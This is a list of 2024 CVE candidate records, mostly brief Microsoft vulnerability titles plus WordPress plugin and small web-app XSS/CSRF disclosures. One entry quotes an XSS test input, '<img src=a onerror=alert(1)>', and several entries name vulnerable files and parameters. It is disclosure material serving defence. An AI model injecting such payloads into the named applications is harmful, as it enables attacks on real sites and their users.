CVE    2024    2145    Candidate    A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been classified as problematic. Affected is an unknown function of the file /endpoint/update-tracker.php. The manipulation of the argument firstname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255498 is the identifier assigned to this vulnerability.    MISC:VDB-255498 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255498   |   MISC:VDB-255498 | SourceCodester Online Mobile Management Store update-tracker.php cross site scripting   |   URL:https://vuldb.com/?id.255498   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Mobile%20Management%20Store.md    Assigned (20240302)
CVE    2024    21448    Candidate    Microsoft Teams for Android Information Disclosure Vulnerability    MISC:Microsoft Teams for Android Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21448    Assigned (20231208)
CVE    2024    21446    Candidate    NTFS Elevation of Privilege Vulnerability    MISC:NTFS Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21446    Assigned (20231208)
CVE    2024    21445    Candidate    Windows USB Print Driver Elevation of Privilege Vulnerability    MISC:Windows USB Print Driver Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21445    Assigned (20231208)
CVE    2024    21439    Candidate    Windows Telephony Server Elevation of Privilege Vulnerability    MISC:Windows Telephony Server Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21439    Assigned (20231208)
CVE    2024    21438    Candidate    Microsoft AllJoyn API Denial of Service Vulnerability    MISC:Microsoft AllJoyn API Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21438    Assigned (20231208)
CVE    2024    21437    Candidate    Windows Graphics Component Elevation of Privilege Vulnerability    MISC:Windows Graphics Component Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21437    Assigned (20231208)
CVE    2024    21436    Candidate    Windows Installer Elevation of Privilege Vulnerability    MISC:Windows Installer Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21436    Assigned (20231208)
CVE    2024    21435    Candidate    Windows OLE Remote Code Execution Vulnerability    MISC:Windows OLE Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21435    Assigned (20231208)
CVE    2024    21434    Candidate    Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability    MISC:Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21434    Assigned (20231208)
CVE    2024    21433    Candidate    Windows Print Spooler Elevation of Privilege Vulnerability    MISC:Windows Print Spooler Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21433    Assigned (20231208)
CVE    2024    21432    Candidate    Windows Update Stack Elevation of Privilege Vulnerability    MISC:Windows Update Stack Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21432    Assigned (20231208)
CVE    2024    21431    Candidate    Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability    MISC:Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21431    Assigned (20231208)
CVE    2024    21430    Candidate    Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability    MISC:Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21430    Assigned (20231208)
CVE    2024    21429    Candidate    Windows USB Hub Driver Remote Code Execution Vulnerability    MISC:Windows USB Hub Driver Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21429    Assigned (20231208)
CVE    2024    21427    Candidate    Windows Kerberos Security Feature Bypass Vulnerability    MISC:Windows Kerberos Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21427    Assigned (20231208)
CVE    2024    21426    Candidate    Microsoft SharePoint Server Remote Code Execution Vulnerability    MISC:Microsoft SharePoint Server Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21426    Assigned (20231208)
CVE    2024    21421    Candidate    Azure SDK Spoofing Vulnerability    MISC:Azure SDK Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21421    Assigned (20231208)
CVE    2024    21419    Candidate    Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability    MISC:Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21419    Assigned (20231208)
CVE    2024    21418    Candidate    Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability    MISC:Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21418    Assigned (20231208)
CVE    2024    21413    Candidate    Microsoft Outlook Remote Code Execution Vulnerability    MISC:https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/   |   MISC:Microsoft Outlook Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413    Assigned (20231208)
CVE    2024    21412    Candidate    Internet Shortcut Files Security Feature Bypass Vulnerability    MISC:Internet Shortcut Files Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412    Assigned (20231208)
CVE    2024    21411    Candidate    Skype for Consumer Remote Code Execution Vulnerability    MISC:Skype for Consumer Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21411    Assigned (20231208)
CVE    2024    21410    Candidate    Microsoft Exchange Server Elevation of Privilege Vulnerability    MISC:Microsoft Exchange Server Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410    Assigned (20231208)
CVE    2024    21408    Candidate    Windows Hyper-V Denial of Service Vulnerability    MISC:Windows Hyper-V Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21408    Assigned (20231208)
CVE    2024    21407    Candidate    Windows Hyper-V Remote Code Execution Vulnerability    MISC:Windows Hyper-V Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21407    Assigned (20231208)
CVE    2024    21406    Candidate    Windows Printing Service Spoofing Vulnerability    MISC:Windows Printing Service Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21406    Assigned (20231208)
CVE    2024    21405    Candidate    Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability    MISC:Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21405    Assigned (20231208)
CVE    2024    21404    Candidate    .NET Denial of Service Vulnerability    MISC:.NET Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21404    Assigned (20231208)
CVE    2024    21403    Candidate    Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability    MISC:Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21403    Assigned (20231208)
CVE    2024    21402    Candidate    Microsoft Outlook Elevation of Privilege Vulnerability    MISC:Microsoft Outlook Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21402    Assigned (20231208)
CVE    2024    21401    Candidate    Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability    MISC:Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21401    Assigned (20231208)
CVE    2024    21399    Candidate    Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability    MISC:Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21399    Assigned (20231208)
CVE    2024    21397    Candidate    Microsoft Azure File Sync Elevation of Privilege Vulnerability    MISC:Microsoft Azure File Sync Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21397    Assigned (20231208)
CVE    2024    21396    Candidate    Dynamics 365 Sales Spoofing Vulnerability    MISC:Dynamics 365 Sales Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21396    Assigned (20231208)
CVE    2024    21394    Candidate    Dynamics 365 Field Service Spoofing Vulnerability    MISC:Dynamics 365 Field Service Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21394    Assigned (20231208)
CVE    2024    21392    Candidate    .NET and Visual Studio Denial of Service Vulnerability    MISC:.NET and Visual Studio Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21392    Assigned (20231208)
CVE    2024    21390    Candidate    Microsoft Authenticator Elevation of Privilege Vulnerability    MISC:Microsoft Authenticator Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21390    Assigned (20231208)
CVE    2024    21388    Candidate    Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability    MISC:Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21388    Assigned (20231208)
CVE    2024    21384    Candidate    Microsoft Office OneNote Remote Code Execution Vulnerability    MISC:Microsoft Office OneNote Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21384    Assigned (20231208)
CVE    2024    21382    Candidate    Microsoft Edge for Android Information Disclosure Vulnerability    MISC:Microsoft Edge for Android Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21382    Assigned (20231208)
CVE    2024    21381    Candidate    Microsoft Azure Active Directory B2C Spoofing Vulnerability    MISC:Microsoft Azure Active Directory B2C Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21381    Assigned (20231208)
CVE    2024    21380    Candidate    Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability    MISC:Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21380    Assigned (20231208)
CVE    2024    21379    Candidate    Microsoft Word Remote Code Execution Vulnerability    MISC:Microsoft Word Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21379    Assigned (20231208)
CVE    2024    21377    Candidate    Windows DNS Information Disclosure Vulnerability    MISC:Windows DNS Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21377    Assigned (20231208)
CVE    2024    21376    Candidate    Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability    MISC:Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21376    Assigned (20231208)
CVE    2024    21364    Candidate    Microsoft Azure Site Recovery Elevation of Privilege Vulnerability    MISC:Microsoft Azure Site Recovery Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21364    Assigned (20231208)
CVE    2024    21363    Candidate    Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability    MISC:Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21363    Assigned (20231208)
CVE    2024    21362    Candidate    Windows Kernel Security Feature Bypass Vulnerability    MISC:Windows Kernel Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21362    Assigned (20231208)
CVE    2024    2136    Candidate    The WPKoi Templates for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Heading widget in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3046089/wpkoi-templates-for-elementor   |   URL:https://plugins.trac.wordpress.org/changeset/3046089/wpkoi-templates-for-elementor   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve    Assigned (20240302)
CVE    2024    21357    Candidate    Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability    MISC:Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21357    Assigned (20231208)
CVE    2024    21356    Candidate    Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability    MISC:Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21356    Assigned (20231208)
CVE    2024    21353    Candidate    Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability    MISC:Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21353    Assigned (20231208)
CVE    2024    21351    Candidate    Windows SmartScreen Security Feature Bypass Vulnerability    MISC:Windows SmartScreen Security Feature Bypass Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21351    Assigned (20231208)
CVE    2024    2135    Candidate    A vulnerability was found in Bdtask Hospita AutoManager up to 20240223 and classified as problematic. This issue affects some unknown processing of the file /hospital_activities/birth/form of the component Hospital Activities Page. The manipulation of the argument Description with the input <img src=a onerror=alert(1)> leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255497 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-255497 | Bdtask Hospita AutoManager Hospital Activities Page form cross site scripting   |   URL:https://vuldb.com/?id.255497   |   MISC:VDB-255497 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255497   |   MISC:https://drive.google.com/file/d/1zi8r84r0B2F45rWSYohZ6TO-PzyNJhnG/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/1zi8r84r0B2F45rWSYohZ6TO-PzyNJhnG/view?usp=drivesdk    Assigned (20240302)
CVE    2024    21349    Candidate    Microsoft ActiveX Data Objects Remote Code Execution Vulnerability    MISC:Microsoft ActiveX Data Objects Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21349    Assigned (20231208)
CVE    2024    21348    Candidate    Internet Connection Sharing (ICS) Denial of Service Vulnerability    MISC:Internet Connection Sharing (ICS) Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21348    Assigned (20231208)
CVE    2024    21346    Candidate    Win32k Elevation of Privilege Vulnerability    MISC:Win32k Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21346    Assigned (20231208)
CVE    2024    21344    Candidate    Windows Network Address Translation (NAT) Denial of Service Vulnerability    MISC:Windows Network Address Translation (NAT) Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21344    Assigned (20231208)
CVE    2024    21342    Candidate    Windows DNS Client Denial of Service Vulnerability    MISC:Windows DNS Client Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21342    Assigned (20231208)
CVE    2024    21341    Candidate    Windows Kernel Remote Code Execution Vulnerability    MISC:Windows Kernel Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21341    Assigned (20231208)
CVE    2024    2134    Candidate    A vulnerability has been found in Bdtask Hospita AutoManager up to 20240223 and classified as problematic. This vulnerability affects unknown code of the file /investigation/delete/ of the component Investigation Report Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255496. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-255496 | Bdtask Hospita AutoManager Investigation Report cross-site request forgery   |   URL:https://vuldb.com/?id.255496   |   MISC:VDB-255496 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.255496   |   MISC:https://drive.google.com/file/d/1JZ9HXuXetQCpbM8O3LJ498lAo9FpoSrD/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/1JZ9HXuXetQCpbM8O3LJ498lAo9FpoSrD/view?usp=drivesdk    Assigned (20240302)
CVE    2024    21339    Candidate    Windows USB Generic Parent Driver Remote Code Execution Vulnerability    MISC:Windows USB Generic Parent Driver Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21339    Assigned (20231208)
CVE    2024    21334    Candidate    Open Management Infrastructure (OMI) Remote Code Execution Vulnerability    MISC:Open Management Infrastructure (OMI) Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21334    Assigned (20231208)
CVE    2024    21330    Candidate    Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability    MISC:Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21330    Assigned (20231208)
CVE    2024    2133    Candidate    A vulnerability, which was classified as problematic, was found in Bdtask Isshue Multi Store eCommerce Shopping Cart Solution 4.0. This affects an unknown part of the file /dashboard/Cinvoice/manage_invoice of the component Manage Sale Page. The manipulation of the argument Title leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255495.    MISC:VDB-255495 | Bdtask Isshue Multi Store eCommerce Shopping Cart Solution Manage Sale Page manage_invoice cross site scripting   |   URL:https://vuldb.com/?id.255495   |   MISC:VDB-255495 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255495   |   MISC:https://drive.google.com/file/d/1cTdMIRngxo1ujqNXwj6nU4zyeeV_sfXD/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/1cTdMIRngxo1ujqNXwj6nU4zyeeV_sfXD/view?usp=drivesdk    Assigned (20240302)
CVE    2024    21329    Candidate    Azure Connected Machine Agent Elevation of Privilege Vulnerability    MISC:Azure Connected Machine Agent Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21329    Assigned (20231208)
CVE    2024    21327    Candidate    Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability    MISC:Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21327    Assigned (20231208)
CVE    2024    21325    Candidate    Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability    MISC:Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21325    Assigned (20231208)
CVE    2024    21320    Candidate    Windows Themes Spoofing Vulnerability    MISC:Windows Themes Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21320    Assigned (20231208)
CVE    2024    21319    Candidate    Microsoft Identity Denial of service vulnerability    MISC:Microsoft Identity Denial of service vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21319    Assigned (20231208)
CVE    2024    21316    Candidate    Windows Server Key Distribution Service Security Feature Bypass    MISC:Windows Server Key Distribution Service Security Feature Bypass   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21316    Assigned (20231208)
CVE    2024    21315    Candidate    Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability    MISC:Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21315    Assigned (20231208)
CVE    2024    21314    Candidate    Microsoft Message Queuing Information Disclosure Vulnerability    MISC:Microsoft Message Queuing Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21314    Assigned (20231208)
CVE    2024    21313    Candidate    Windows TCP/IP Information Disclosure Vulnerability    MISC:Windows TCP/IP Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21313    Assigned (20231208)
CVE    2024    21312    Candidate    .NET Framework Denial of Service Vulnerability    CONFIRM:https://security.netapp.com/advisory/ntap-20240208-0008/   |   MISC:.NET Framework Denial of Service Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21312    Assigned (20231208)
CVE    2024    21311    Candidate    Windows Cryptographic Services Information Disclosure Vulnerability    MISC:Windows Cryptographic Services Information Disclosure Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21311    Assigned (20231208)
CVE    2024    21310    Candidate    Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability    MISC:Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21310    Assigned (20231208)
CVE    2024    2131    Candidate    The Move Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's infobox and button widget in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve    Assigned (20240302)
CVE    2024    21309    Candidate    Windows Kernel-Mode Driver Elevation of Privilege Vulnerability    MISC:Windows Kernel-Mode Driver Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21309    Assigned (20231208)
CVE    2024    21307    Candidate    Remote Desktop Client Remote Code Execution Vulnerability    MISC:Remote Desktop Client Remote Code Execution Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21307    Assigned (20231208)
CVE    2024    21306    Candidate    Microsoft Bluetooth Driver Spoofing Vulnerability    MISC:Microsoft Bluetooth Driver Spoofing Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21306    Assigned (20231208)
CVE    2024    21304    Candidate    Trusted Compute Base Elevation of Privilege Vulnerability    MISC:Trusted Compute Base Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21304    Assigned (20231208)
CVE    2024    2130    Candidate    The CWW Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Module2 widget in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve    Assigned (20240301)
CVE    2024    2129    Candidate    The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's heading widget in all versions up to, and including, 1.3.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://wordpress.org/plugins/wpbits-addons-for-elementor/   |   URL:https://wordpress.org/plugins/wpbits-addons-for-elementor/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve    Assigned (20240301)
CVE    2024    2128    Candidate    The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed widget in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.10/EmbedPress/Elementor/Widgets/Embedpress_Pdf.php#L688   |   URL:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.10/EmbedPress/Elementor/Widgets/Embedpress_Pdf.php#L688   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve    Assigned (20240301)
CVE    2024    2127    Candidate    The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom attributes in all versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve    Assigned (20240301)
CVE    2024    2126    Candidate    The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Registration Form widget in all versions up to, and including, 2.10.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3046442/themeisle-companion   |   URL:https://plugins.trac.wordpress.org/changeset/3046442/themeisle-companion   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve    Assigned (20240301)
CVE    2024    2124    Candidate    The Translate WordPress and go Multilingual – Weglot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget/block in all versions up to, and including, 4.2.5 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/weglot/trunk/src/actions/class-register-widget-weglot.php#L53   |   URL:https://plugins.trac.wordpress.org/browser/weglot/trunk/src/actions/class-register-widget-weglot.php#L53   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail=   |   